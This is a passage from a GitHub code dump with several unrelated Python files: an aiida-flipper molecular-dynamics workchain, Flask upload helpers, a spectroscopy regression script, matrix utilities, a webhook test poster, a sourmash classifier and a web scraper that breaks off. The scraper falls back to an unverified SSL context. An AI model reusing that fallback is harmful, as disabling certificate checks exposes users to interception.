self.ctx.inputs.metadata.options.get('max_wallclock_seconds', None)\n if max_wallclock_seconds is not None and 'max_seconds' not in self.ctx.inputs.parameters['CONTROL']: \n self.set_max_seconds(max_wallclock_seconds)\n\n self.ctx.inputs.parameters['CONTROL']['nstep'] = self.ctx.mdsteps_todo\n self.ctx.inputs.metadata['label'] = f'flipper_{self.ctx.iteration:02d}'\n self.ctx.has_initial_velocities = False\n\n ## if this is not flipper MD\n #if not input_dict['CONTROL'].get('lflipper', False):\n # input_dict['IONS']['wfc_extrapolation'] = 'second_order'\n # input_dict['IONS']['pot_extrapolation'] = 'second_order'\n\n ## HUSTLER STUFF (not implemented)\n if self.inputs.get('is_hustler', False):\n raise NotImplementedError('Please run hustler workchain.')\n # hustler_positions = self.inputs.hustler_positions\n # if self.ctx.steps_done:\n # #~ self.ctx.array_splitting_indices.append(self.ctx.steps_done)\n # inlinec, res = split_hustler_array_inline(\n # array=hustler_positions, parameters=get_or_create_parameters(dict(index=self.ctx.steps_done))\n # )\n # return_d['split_hustler_array_{}'.format(\n # str(self.ctx.iteration).rjust(len(str(self._MAX_ITERATIONS)), str(0))\n # )] = inlinec\n # 
calc.use_array(res['split_array'])\n # else:\n # calc.use_array(hustler_positions)\n\n# def run_process(self):\n# \"\"\"Run the next process, taking the input dictionary from the context at `self.ctx.inputs`.\"\"\"\n\n# def inspect_process(self):\n# \"\"\"Analyse the results of the previous process and call the handlers when necessary. [...]\"\"\"\n# super().inspect_process()\n\n def check_energy_fluctuations(self):\n \"\"\"Check the fluctuations of the total energy of the total trajectory so far.\n If they are higher of the threshold, abort.\n \"\"\"\n total_energy_max_fluctuation = self.inputs.get('total_energy_max_fluctuation', None)\n if total_energy_max_fluctuation:\n calculation = self.ctx.children[self.ctx.iteration - 1]\n try:\n traj = calculation.outputs.output_trajectory\n except exceptions.NotExistent:\n self.report('{}><{}> [check_energy_fluctuations]: Trajectory not found. Skipping test.'.format(\n calculation.process_label, calculation.pk))\n else:\n traj = get_total_trajectory(self, store=False)\n total_energies = traj.get_array('total_energies')\n diff = total_energies.max() - total_energies.min() \n if (diff > total_energy_max_fluctuation):\n self.report(\n '{}<{}> [check_energy_fluctuations]: Total energy fluctuations = {} EXCEEDED THRESHOLD {} !!'\n ' Stopping now...'.format(calculation.process_label, calculation.pk, diff, total_energy_max_fluctuation))\n return self.exit_codes.ERROR_TOTAL_ENERGY_FLUCTUATIONS\n else:\n self.report('{}<{}> [check_energy_fluctuations]: Total energy fluctuations = {} < threshold ({}) OK'.format(\n calculation.process_label, calculation.pk, diff, total_energy_max_fluctuation))\n\n def update_mdsteps(self):\n \"\"\"Get the number of steps of the last trajectory and update the counters. If there are more MD steps to do,\n set `restart_calc` and set the state to not finished.\n \"\"\"\n # The extra 'discard_trajectory' indicates if we wish to discard the trajectory, for whatever reason (not sure it ever happens).\n # If the calculation was successfull, there will be a trajectory\n # In this case we we shall restart from this calculation, otherwise restart_calc is not modified, such that we\n # will restart from the previous one.\n node = self.ctx.children[self.ctx.iteration - 1]\n try:\n traj = node.outputs.output_trajectory\n except (KeyError, exceptions.NotExistent):\n self.report('No output_trajectory was generated by {}<{}>.'.format(node.label, node.pk))\n # restart_calc is not updated, so we will restart from the last calculation (i.e. we retry the same thing)\n else:\n nsteps_run_last_calc = get_completed_number_of_steps(node)\n if not traj.get_extra('discard_trajectory', False):\n self.ctx.mdsteps_todo -= nsteps_run_last_calc\n self.ctx.mdsteps_done += nsteps_run_last_calc\n self.report('{}<{}> ran {} steps ({} done - {} to go).'.format(node.process_label, node.pk, nsteps_run_last_calc, self.ctx.mdsteps_done, self.ctx.mdsteps_todo))\n\n # if there are more MD steps to do, set the restart_calc to the last calculation\n if self.ctx.mdsteps_todo > 0:\n self.ctx.restart_calc = node\n self.ctx.is_finished = False\n else:\n self.report('{}<{}> ran {} steps. 
This trajectory will be DISCARDED!'.format(node.process_label, node.pk, nsteps_run_last_calc))\n\n# def report_error_handled(self, calculation, action):\n# \"\"\"Report an action taken for a calculation that has failed.\n#\n# This should be called in a registered error handler if its condition is met and an action was taken.\n#\n# :param calculation: the failed calculation node\n# :param action: a string message with the action taken\n# \"\"\"\n# arguments = [calculation.process_label, calculation.pk, calculation.exit_status, calculation.exit_message]\n# self.report('{}<{}> failed with exit status {}: {}'.format(*arguments))\n# self.report('Action taken: {}'.format(action))\n\n def results(self): # pylint: disable=inconsistent-return-statements\n \"\"\"Concatenate the trajectories and attach the outputs.\"\"\"\n # get the concatenated trajectory, even if the max number of iterations have been reached\n if self.inputs.get('previous_trajectory'):\n traj = get_total_trajectory(self, self.ctx.previous_trajectory, store=True)\n else:\n traj = get_total_trajectory(self, store=True)\n if traj:\n self.out('total_trajectory', traj)\n else:\n self.report('No trajectories were produced!')\n# return self.exit_codes.ERROR_NO_TRAJECTORY_PRODUCED\n try:\n node = self.ctx.children[self.ctx.iteration - 1]\n # We check the `is_finished` attribute of the work chain and not the successfulness of the last process\n # because the error handlers in the last iteration can have qualified a \"failed\" process as satisfactory\n # for the outcome of the work chain and so have marked it as `is_finished=True`.\n if not self.ctx.is_finished and self.ctx.iteration >= self.inputs.max_iterations.value:\n self.report(f'reached the maximum number of iterations {self.inputs.max_iterations.valu}: last ran {self.ctx.process_name}<{node.pk}>')\n return self.exit_codes.ERROR_MAXIMUM_ITERATIONS_EXCEEDED # pylint: disable=no-member\n except AttributeError:\n self.report(f'workchain did not run since a previous trajectory<{self.ctx.previous_trajectory}> already had the required number of nsteps')\n\n self.report(f'work chain completed after {self.ctx.iteration} iterations')\n\n def _wrap_bare_dict_inputs(self, port_namespace, inputs):\n \"\"\"Wrap bare dictionaries in `inputs` in a `Dict` node if dictated by the corresponding inputs portnamespace.\n\n :param port_namespace: a `PortNamespace`\n :param inputs: a dictionary of inputs intended for submission of the process\n :return: an attribute dictionary with all bare dictionaries wrapped in `Dict` if dictated by the port namespace\n \"\"\"\n from aiida.engine.processes import PortNamespace\n\n wrapped = {}\n\n for key, value in inputs.items():\n\n if key not in port_namespace:\n wrapped[key] = value\n continue\n\n port = port_namespace[key]\n\n if isinstance(port, PortNamespace):\n wrapped[key] = self._wrap_bare_dict_inputs(port, value)\n elif port.valid_type == orm.Dict and isinstance(value, dict):\n wrapped[key] = get_or_create_input_node(orm.Dict, value, store=True)\n else:\n wrapped[key] = value\n\n return AttributeDict(wrapped)\n\n\n ### PROCESS HANDLERS ###\n # error codes > 600 are related to MD trajectories\n # Often these errors happen when the calculation is killed in the middle of writing.\n # If an output trajectory is found, we shall always restart, no matter the error.\n # Even with error codes < 400 a trajectory may have been produced.\n # Otherwise, execute the other error handlers.\n # If no error handler is triggered (or none has returned a ProcessHandlerReport), 
the error is considered as\n # 'unhandled': in this case the calculation will be relaunched once. If it fails again, the work chain will fail.\n\n @process_handler(priority=700)\n def handle_salvage_output_trajectory(self, calculation):\n \"\"\"Check if an output trajectory was generated, no matter if the calculation failed, and restart.\"\"\"\n try:\n traj = calculation.outputs.output_trajectory\n except exceptions.NotExistent:\n # no output_trajectory, go through the other error handlers\n return\n else:\n # restart from trajectory\n self.ctx.restart_calc = calculation\n if calculation.exit_status != 0: self.report_error_handled(calculation, 'Restarting calculation...')\n return ProcessHandlerReport(True)\n\n# @process_handler(priority=600)\n# def handle_unrecoverable_failure(self, calculation):\n# \"\"\"Handle calculations with an exit status below 400 which are unrecoverable, so abort the work chain.\"\"\"\n# if calculation.is_failed and calculation.exit_status < 400:\n# self.report_error_handled(calculation, 'unrecoverable error, aborting...')\n# return ProcessHandlerReport(True, self.exit_codes.ERROR_UNRECOVERABLE_FAILURE)\n\n# @process_handler(priority=590, exit_codes=[\n# PwCalculation.exit_codes.ERROR_COMPUTING_CHOLESKY,\n# ])\n# def handle_known_unrecoverable_failure(self, calculation):\n# \"\"\"Handle calculations with an exit status that correspond to a known failure mode that are unrecoverable.\n#\n# These failures may always be unrecoverable or at some point a handler may be devised.\n# \"\"\"\n# self.report_error_handled(calculation, 'known unrecoverable failure detected, aborting...')\n# return ProcessHandlerReport(True, self.exit_codes.ERROR_KNOWN_UNRECOVERABLE_FAILURE)\n\n ### EXIT CODES >= 400 THAT HAVE NOT BEEN HANDLED YET\n# @process_handler(priority=410, exit_codes=[\n# FlipperCalculation.exit_codes.ERROR_ELECTRONIC_CONVERGENCE_NOT_REACHED,])\n# def handle_electronic_convergence_not_achieved(self, calculation):\n# \"\"\"Handle `ERROR_ELECTRONIC_CONVERGENCE_NOT_REACHED`: decrease the mixing beta and restart from scratch.\"\"\"\n\n ## add possible flipper-specific error handlers\n","repo_name":"epfl-theos/aiida-flipper","sub_path":"aiida_flipper/workflows/replaymd.py","file_name":"replaymd.py","file_ext":"py","file_size_in_byte":41291,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
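The step bookkeeping used in this workchain when restarting from a previous trajectory (mdsteps_done / mdsteps_todo) boils down to counting how many MD steps a stored trajectory already covers: iprint * (number of frames - 1). A minimal stand-alone sketch of that arithmetic, with invented numbers in place of the workchain context:

def remaining_md_steps(nstep_target, iprint, n_frames_previous):
    """Return (steps_done, steps_todo) after crediting a previous trajectory.

    A trajectory holding n_frames_previous frames written every iprint MD steps
    covers iprint * (n_frames_previous - 1) steps; steps_todo can go negative,
    in which case no further MD run needs to be launched.
    """
    steps_done = iprint * (n_frames_previous - 1)
    return steps_done, nstep_target - steps_done

# Assumed values: 50000-step target, one frame every 10 steps, 2001 stored frames.
done, todo = remaining_md_steps(50_000, 10, 2001)
print(done, todo)  # 20000 steps already covered, 30000 still to go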
+{"seq_id":"41687497880","text":"import os\nfrom flask import abort, current_app\nfrom werkzeug.utils import secure_filename\nfrom instance.config import ALLOWED_EXTENSIONS\n\n\ndef content_folder(object_type, id, content_type, upload=False):\n tail = os.path.join(content_type, object_type, str(id))\n\n if upload:\n base_dir = os.path.join(current_app.config['CONTENT_ROOT_UPLOAD'], tail)\n if not os.path.exists(base_dir):\n os.makedirs(base_dir)\n return base_dir\n else:\n if os.path.exists(os.path.join(current_app.config['CONTENT_ROOT_UPLOAD'], tail)):\n return os.path.join(current_app.config['CONTENT_ROOT_DOWNLOAD'], tail)\n else:\n return os.path.join(current_app.config['CONTENT_ROOT_DOWNLOAD'], content_type, object_type, '0')\n\n\ndef get_uploaded_file(request):\n\n # check if the post request has the file part\n if 'file' not in request.files:\n abort(400, 'No file part in the request')\n\n pic = request.files['file']\n\n if pic.filename == '':\n abort(400, 'No file selected for uploading')\n\n if not allowed_file(pic.filename):\n abort(400, 'Allowed file types are txt, pdf, png, jpg, jpeg, gif')\n\n filename = secure_filename(pic.filename)\n\n return pic, filename\n\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n","repo_name":"Dandelion-dev-team/dandelion","sub_path":"Flask/app/utils/uploads.py","file_name":"uploads.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"26645946105","text":"from __future__ import division\nimport os\nimport numpy as np\nimport pandas as pd\nfrom time import time\nimport matplotlib.pyplot as plt\nfrom astropy.io import fits\nfrom sklearn import linear_model, preprocessing\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import validation_curve\ntry:\n import cPickle\nexcept ImportError:\n import _pickle as cPickle\n\nfrom utils import create_combined, prepare_linelist, prepare_spectrum, save_and_compare_apogee, save_and_compare_synthetic\n\n\ndef poly_clf():\n polynomial_features = PolynomialFeatures(degree=3, include_bias=False)\n linear_regression = linear_model.LinearRegression()\n clf = Pipeline([(\"polynomial_features\", polynomial_features), (\"linear_regression\", linear_regression)])\n #clf.fit(X[:, np.newaxis], y)\n #y_pred = clf.predict(X_test[:, np.newaxis])\n return clf\n\n\ndef validation():\n\n if not os.path.isfile('combined_spec.csv'):\n create_combined()\n\n df = pd.read_csv('combined_spec.csv', index_col=0)\n df.set_index('spectrum', inplace=True)\n xlabel = df.columns.values[:-7]\n ylabel = df.columns.values[-7:-3]\n X = df.loc[:, xlabel]\n y = df.loc[:, ylabel]\n\n param_range = [0.0001, 0.001, 0.01]\n #linear_model.RidgeCV(alphas=[0.01, 0.1, 1.0, 10.0, 100.0, 1000.0])\n #linear_model.Ridge(alpha=[0.001])\n\n train_scores, test_scores = validation_curve(linear_model.Ridge(), X, y, param_name=\"alpha\", param_range=param_range, scoring=\"accuracy\", n_jobs=-1)\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n\n plt.title(\"Validation Curve\")\n plt.xlabel(\"alpha\")\n plt.ylabel(\"Score\")\n plt.ylim(0.0, 1.1)\n lw = 2\n plt.semilogx(param_range, train_scores_mean, label=\"Training score\",\n color=\"darkorange\", lw=lw)\n plt.fill_between(param_range, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.2,\n color=\"darkorange\", lw=lw)\n plt.semilogx(param_range, test_scores_mean, label=\"Cross-validation score\",\n color=\"navy\", lw=lw)\n plt.fill_between(param_range, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.2,\n color=\"navy\", lw=lw)\n plt.legend(loc=\"best\")\n plt.show()\n\n\ndef train(clf, model, save=True, cutoff=0.9999, percent=50, plot=True, scale=False):\n # Model just for saving options\n if not os.path.isfile('combined_spec.csv'):\n create_combined()\n\n df = pd.read_csv('combined_spec.csv', index_col=0)\n df.set_index('spectrum', inplace=True)\n xlabel = df.columns.values[:-7]\n ylabel = df.columns.values[-7:-3]\n X = df.loc[:, xlabel]\n y = df.loc[:, ylabel]\n\n # select continuum\n continuum = []\n for xlab in xlabel[:]:\n flux = X[xlab]\n flux_cont = flux.loc[flux > cutoff]\n if (len(flux_cont)/len(flux))*100 > percent:\n continuum.append(xlab)\n\n columns = np.array(continuum)\n X.drop(columns, inplace=True, axis=1)\n print('The number of flux points is %s from the original %s.' 
% (len(xlabel)-len(continuum), len(xlabel)))\n if scale:\n #Is this ok?\n X = preprocessing.robust_scale(X)\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n clffit = clf.fit(X_train, y_train)\n print(clffit)\n N = len(y_test)\n t = time()\n y_pred = clf.predict(X_test)\n t = time()-t\n speedup = 60*N/t\n print('Calculated parameters for {} stars in {:.2f}ms'.format(N, t*1e3))\n print('Speedup: {} million times'.format(int(speedup/1e6)))\n print('Test set score: {:.2f}'.format(clf.score(X_test, y_test)))\n print('Training set score: {:.2f}'.format(clffit.score(X_train, y_train)))\n\n for i, label in enumerate(ylabel):\n score = mean_absolute_error(y_test[label], y_pred[:, i])\n print('Mean absolute error for {}: {:.2f}'.format(label, score))\n if plot:\n plt.figure()\n plt.scatter(y_test[label], y_test[label].values - y_pred[:, i], s=70, alpha=0.4)\n plt.grid()\n plt.title(label)\n plt.savefig(label + '_' + model + '.png')\n plt.show()\n\n if save:\n with open('FASMA_ML.pkl', 'wb') as f:\n cPickle.dump(clf, f)\n return clf, continuum\n\n\ndef train_models(mod):\n\n print('Selected model: %s' % mod)\n if mod == 'linear':\n clf = linear_model.LinearRegression(n_jobs=-1)\n elif mod == 'lasso':\n clf = linear_model.Lasso(alpha=0.001, max_iter=10000, tol=0.001, normalize=True, positive=True)\n elif mod == 'lassolars':\n clf = linear_model.LassoLars(alpha=0.001)\n elif mod == 'multilasso':\n clf = linear_model.MultiTaskLasso(alpha=0.1)\n elif mod == 'ridgeCV':\n clf = linear_model.RidgeCV(alphas=[0.01, 0.1, 1.0, 10.0, 100.0, 1000.0])\n elif mod == 'ridge':\n clf = linear_model.Ridge(alpha=[0.001])\n elif mod == 'bayes':\n clf = linear_model.BayesianRidge()\n elif mod == 'huber':\n clf = linear_model.HuberRegressor()\n elif mod == 'poly':\n clf = poly_clf()\n\n clf, continuum = train(clf, mod, save=True, plot=True)\n return clf, continuum\n\n\ndef test_set(clf, model, continuum=None, scale=False):\n\n #here model is just for saving the plot files\n spec = np.genfromtxt('obs_synth.lst', dtype='str')\n params = []\n for s in spec:\n x = prepare_spectrum(s, continuum)\n if scale:\n x = preprocessing.robust_scale(x)\n\n p = clf.predict(x)[0]\n params.append(p)\n #plt.plot(clf.coef_[0], x[0], 'o')\n #plt.show()\n\n #teff = np.dot(clf.coef_[0], x[0]) + clf.intercept_[0]\n #print('teff', teff)\n #print('Star: %s' % s)\n #print('\\nStellar atmospheric parameters:')\n #print('Teff: {:.0f} K'.format(p[0]))\n #print('logg: {:.2f} dex'.format(p[1]))\n #print('[M/H]: {:.2f} dex'.format(p[2]))\n #print('alpha: {:.2f} dex'.format(p[3]))\n #print('vt: {:.2f} km/s'.format(p[4]))\n #print('vmac: {:.2f} km/s'.format(p[5]))\n #print('vsini: {:.2f} km/s'.format(p[6]))\n params = np.array(params)\n d = [spec, params[:, 0], params[:, 1], params[:, 2], params[:, 3]]\n d = np.array(d)\n spec = list(map(lambda x: x.split('/')[-1], spec))\n d = {'specname': spec, 'teff': params[:, 0], 'logg': params[:, 1], 'metal': params[:, 2], 'alpha': params[:, 3]}\n\n results = save_and_compare_synthetic(d, model)\n #save_and_compare_apogee(d)\n return results\n\n\ndef lasso(alpha):\n clf = linear_model.Lasso(alpha=alpha, max_iter=10000, normalize=True)\n mod = 'lasso_' + str(alpha)\n train(clf, mod)\n return\n\n\ndef ridge(alpha, cutoff=0.9999, percent=50):\n clf = linear_model.Ridge(alpha=[alpha])\n model = 'ridge_' + str(alpha) + '_' + str(percent)\n clf, continuum = train(clf, model, save=True, cutoff=0.9999, percent=percent, plot=True, scale=False)\n results = test_set(clf, model, continuum)\n return 
results\n\nif __name__ == '__main__':\n\n models = ['ridge']\n #models = ['linear', 'lasso', 'multilasso', 'lassolars', 'ridge', 'ridgeCV', 'bayes', 'huber', 'poly']\n #validation()\n #for mod in models:\n # clf, continuum = train_models(mod)\n # #with open('FASMA_ML.pkl', 'rb') as f:\n # # clf = cPickle.load(f)\n # #print(clf)\n # test_set(clf, mod, continuum=continuum)\n\n alpha = [0.01, 0.1]\n for a in alpha:\n results = ridge(a, cutoff=0.9999, percent=50)\n","repo_name":"MariaTsantaki/spectroscopy-ML","sub_path":"specML/test_model_ML.py","file_name":"test_model_ML.py","file_ext":"py","file_size_in_byte":7794,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"}
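The continuum filter inside train() above (drop any flux column where more than `percent` percent of the values exceed `cutoff`) is easy to check on synthetic data. A sketch with made-up fluxes, reusing the same cutoff=0.9999 / percent=50 defaults and a plain Ridge fit:

import numpy as np
import pandas as pd
from sklearn.linear_model import Ridge

rng = np.random.default_rng(0)
lines = rng.uniform(0.70, 0.95, size=(100, 10))      # absorption-line fluxes
cont = rng.uniform(0.99995, 1.0, size=(100, 40))     # near-unity continuum fluxes
X = pd.DataFrame(np.hstack([lines, cont]), columns=[f"wl_{i}" for i in range(50)])
y = X.iloc[:, :10].sum(axis=1)                       # target depends on the line points only

cutoff, percent = 0.9999, 50
continuum = [c for c in X.columns if (X[c] > cutoff).mean() * 100 > percent]
X_kept = X.drop(columns=continuum)

clf = Ridge(alpha=0.001).fit(X_kept, y)
print(f"dropped {len(continuum)} continuum columns, R^2 = {clf.score(X_kept, y):.3f}")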
+{"seq_id":"42788716713","text":"import numpy as np\n\ndef triangular2flattened(x):\n \"\"\"Receives a square matrix and returns a flat array with upper-diagonal elements\n\n Args:\n x (ndarray): ndarray of shape (n,n), ideally upper-diagonal or symmetric\n\n Returns:\n ndarray: flattened ndarray of length n*(n+1)/2 with elements x11,x12,...,x1n,x22,...,xnn of x\n \"\"\"\n assert len(x.shape) == 2\n assert x.shape[0] == x.shape[1]\n return x[np.triu_indices(x.shape[0])]\n\ndef flattened2triangular(flat, n=None):\n \"\"\"Receives a flattened list of size n*(n+1)/2 and returns upper-triangular square matrix\n\n Args:\n flat (ndarray): ndarray with values [a11,a12,...,a1n,a22,...,ann]\n n [optional] (int): dimention of the triangular matrix, such that n*(n+1)/2 = len(flat)\n\n Returns:\n ndarray: triangular matrix of shape (n,n) with upper-diagonal valuer filled with elements of flat\n \"\"\"\n if n is None:\n N = len(flat)\n # solves basic equation n*(n-1)/2 = N\n n = (-1. + np.sqrt(1.+8.*N))/2\n else:\n assert len(flat) == n*(n+1)/2\n assert float(n).is_integer()\n n = int(n)\n sqr = np.zeros((n,n))\n sqr[np.triu_indices(n)] = flat\n return sqr\n\n## Test\n# a = np.array([1,2,3,4,5,6])\n# sqr = flattened2triangular(a)\n# print(sqr)\n# print(triangular2flattened(sqr))","repo_name":"danielquintao/longitudinalmodels","sub_path":"utils/matrix_utils.py","file_name":"matrix_utils.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"15929042596","text":"\"\"\"This is a test file, and it has not been used in the production code.\nThis file is used to manually send Alchemy Webhook data to the webhook URL.\n\nBefore running this file, please MAKE SURE you are running test_app.py in TESTS directory.\nAlso, make sure you've added the target address in tracking_wallets.json.\n\"\"\"\nimport requests\n\nimport utilities as utils\n\nwebhook_url = utils.read_config()[\"webhook_url\"] + \"/alchemy\"\n\n\n# Alchemy Webhook data\n# You can find Alchemy Webhook data from the logs directory\n# Lists of Alchemy Webhook data dicts\ndatas = [{dict},\n {dict}, ...]\n\n\nfor data in datas:\n # Send a POST request to the webhook URL\n response = requests.post(webhook_url, json=data)\n\n # Check the response status\n if response.status_code == 200:\n print(\"Request sent successfully.\")\n else:\n print(f\"Request failed with status code {response.status_code}: {response.text}\")\n","repo_name":"HappyGroupHub/Ethereum-Wallet-Tracker","sub_path":"tests/manual_alchemy.py","file_name":"manual_alchemy.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"2"}
+{"seq_id":"33049795079","text":"#! /usr/bin/env python\n\"\"\"\nDig into the bulk classification results from bulk-classify-sbt-with-lca.py.\n\nBriefly, this script sorts results classed above order level into two bins\n* those that contain multiple hashes belonging unambiguously to two different\n species, i.e. chimerae.\n* other, e.g. things classed as a single lineage.\n\"\"\"\nimport sourmash\nimport sys\nfrom collections import defaultdict\nimport pprint\nimport csv\nimport os\n\nfrom sourmash.logging import error, debug, set_quiet, notify\nfrom sourmash.lca import lca_utils\nfrom sourmash.lca.command_classify import classify_signature\nimport argparse\n\nFILTER_AT='order'\n\n\ndef summarize_agg_to_level(hashvals, dblist, threshold, level):\n \"\"\"\n Classify 'hashvals' using the given list of databases.\n\n Insist on at least 'threshold' counts of a given lineage before taking\n it seriously.\n\n Return (lineage, counts) where 'lineage' is a tuple of LineagePairs.\n \"\"\"\n\n stop_at = []\n for i in lca_utils.taxlist(include_strain=False):\n stop_at.append(i)\n if i == level:\n break\n\n # gather assignments from across all the databases\n assignments = lca_utils.gather_assignments(hashvals, dblist)\n\n # now convert to trees -> do LCA & counts\n counts = lca_utils.count_lca_for_assignments(assignments)\n debug(counts.most_common())\n\n # ok, we now have the LCAs for each hashval, and their number\n # of counts. Now aggregate counts across the tree, up 'til desired\n # level; stop there.\n aggregated_counts = defaultdict(int)\n for lca, count in counts.most_common():\n if count < threshold:\n break\n\n if not lca:\n aggregated_counts[lca] += count\n continue\n\n if lca[-1].rank in stop_at:\n aggregated_counts[lca] += count\n continue\n\n # climb from the lca to the root.\n while lca:\n lca = lca[:-1]\n if lca and lca[-1].rank in stop_at:\n aggregated_counts[lca] += count\n break\n\n return aggregated_counts\n\n\ndef main(args):\n \"\"\"\n \"\"\"\n p = argparse.ArgumentParser()\n p.add_argument('prefix')\n p.add_argument('lca_db', nargs='+')\n p.add_argument('classify_csv')\n p.add_argument('--scaled', type=float)\n p.add_argument('--threshold', type=int, default=5)\n p.add_argument('-q', '--quiet', action='store_true',\n help='suppress non-error output')\n p.add_argument('-d', '--debug', action='store_true',\n help='output debugging output')\n p.add_argument('--confused-hashvals', type=str)\n args = p.parse_args(args)\n\n dirname = '{}-unclassified-sigs'.format(args.prefix)\n dirname2 = '{}-unclassified-sigs-chimera.info'.format(args.prefix)\n try:\n os.mkdir(dirname2)\n except:\n pass\n set_quiet(args.quiet, args.debug)\n\n if args.scaled:\n args.scaled = int(args.scaled)\n\n # load all the databases\n dblist, ksize, scaled = lca_utils.load_databases(args.lca_db, args.scaled)\n\n print(ksize, scaled)\n\n assert len(dblist) == 1\n lca_db = dblist[0]\n\n confused_hashvals = set()\n if args.confused_hashvals:\n for i in open(args.confused_hashvals, 'rt'):\n confused_hashvals.add(int(i.strip()))\n\n ###\n\n fp = open(args.classify_csv, 'rt')\n r = csv.DictReader(fp, fieldnames=['rank', 'name', 'filename', 'md5sum'])\n\n fp2 = open('{}-dig.csv'.format(args.prefix), 'wt')\n w = csv.writer(fp2)\n\n n = 0\n m = 0\n for row in r:\n if row['rank'] in ('MISSED', 'species', 'genus', 'family', 'order'):\n continue\n name = row['name']\n md5sum = row['md5sum']\n sig = sourmash.load_one_signature(os.path.join(dirname, md5sum) + '.sig')\n\n hashvals = defaultdict(int)\n for hashval in 
sig.minhash.get_mins():\n if hashval not in confused_hashvals:\n hashvals[hashval] += 1\n\n lineage_counts = summarize_agg_to_level(hashvals, dblist, args.threshold, FILTER_AT)\n\n if len(lineage_counts) >= 2:\n print(name)\n for lineage, count in lineage_counts.items():\n if lineage:\n print(' ', count, \";\".join(lca_utils.zip_lineage(lineage)))\n else:\n print(' ', count, 'root')\n print('----\\n')\n\n fp3 = open(os.path.join(dirname2, row['md5sum']) + '.txt', 'wt')\n for lineage, count in lineage_counts.items():\n fp3.write(\"{} {}\\n\".format(count, \";\".join(lca_utils.zip_lineage(lineage))))\n fp3.close()\n \n n += 1\n\n w.writerow(['chimera', row['name'], row['filename'], row['md5sum']])\n else:\n w.writerow(['other', row['name'], row['filename'], row['md5sum']])\n m += 1\n\n print(n, m)\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"dib-lab/2019-sourmash-gtdb","sub_path":"bulk-classify-dig.py","file_name":"bulk-classify-dig.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
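The core of summarize_agg_to_level in this record is the climb from each LCA lineage toward the root until a rank at or above the requested level is reached, accumulating the counts there. A simplified stand-in of that aggregation (no count threshold, plain (rank, name) tuples instead of sourmash LineagePairs):

from collections import defaultdict

STOP_AT = ["superkingdom", "phylum", "class", "order"]       # ranks kept, down to `order`

def aggregate(counts, stop_at=STOP_AT):
    agg = defaultdict(int)
    for lineage, count in counts:
        while lineage and lineage[-1][0] not in stop_at:
            lineage = lineage[:-1]                           # climb one rank toward the root
        agg[lineage] += count
    return dict(agg)

counts = [
    ((("superkingdom", "Bacteria"), ("phylum", "Firmicutes"), ("class", "Bacilli"),
      ("order", "Lactobacillales"), ("family", "Streptococcaceae")), 12),   # rolled up to order
    ((("superkingdom", "Bacteria"), ("phylum", "Proteobacteria")), 3),      # already above order
    ((), 1),                                                                # root stays at root
]
print(aggregate(counts))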
+{"seq_id":"8119552781","text":"# import libraries\nimport urllib\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nfrom requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nimport ssl\nimport urllib.request as request\nimport html2text\nimport io\n\nfrom preprocess import clean_data\n\ndef url_check(url):\n\t\"\"\"\n\tChecks the url if it is accessible.\n\tIt takes into account some possible exceptions.\n\t\"\"\"\n\n\ttry:\n\t\tresponse = urlopen(url)\n\t\treturn True\n\texcept urllib.error.HTTPError:\n\t\treturn False\n\texcept urllib.error.URLError:\n\t\treturn False\n\t#except httplib.HTTPException:\n\texcept Exception:\n\t\timport traceback\n\t\treturn False\n\n\ndef get_urls(url):\n\t\"\"\"\n\tReturns all the urls in the same domain as a list.\n\t\n\t\"\"\"\n\t## Get raw html content from url\n\tcontent = simple_get(url)\n\n\tif content is None:\n \t## Try a different protocol\n\t\ttry:\n\t\t\tcontext = ssl._create_unverified_context()\n\t\t\twebsite = urlopen(url, context=context)\n\t\t\twebsite = urlopen(url)\n\t\t\tcontent = website.read()\n\t\texcept:\n\t\t\turl_list = []\n\t\t\treturn url_list\n \n\tsoup = BeautifulSoup(content,\"html5lib\")\n\t\n\tlinks = soup.findAll(\"a\")\n\turl_list = []\n\tfor link in links:\n\t\tsub_url = link.get('href')\n\t\tif sub_url is not None:\n \t## Check if the url is in the same domain\n\t\t\tif 'http' in sub_url and url_cleaning(url) in sub_url: \n\t\t\t\turl_list.append(sub_url)\n\n\tprint(\"get_urls done\")\n\treturn url_list\n\n\ndef simple_get(url):\n \"\"\"\n Attempts to get the content at \"url\" by making an HTTP GET request.\n If the content-type of response is some kind of HTML/XML, return the\n text content, otherwise return None.\n \"\"\"\n try:\n with closing(get(url, stream=True)) as resp:\n if is_good_response(resp):\n \treturn resp.content\n else:\n \treturn None\n\n except RequestException as e:\n print('Error during requests to {0} : {1}'.format(url, str(e)))\n return None\n\ndef is_good_response(resp):\n \"\"\"\n Returns True if the response seems to be HTML, False otherwise.\n \"\"\"\n if \"Content-Type\" in resp.headers.keys():\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code == 200 \n and content_type is not None \n and content_type.find('html') > -1)\n\n\ndef get_content(url):\n\t\"\"\"\n\tConverts html content to text, and return the content if it's not None.\n\t\"\"\"\n\traw_html = simple_get(url)\n\tif raw_html is not None:\n\t\ttry:\n\t\t\traw_html = 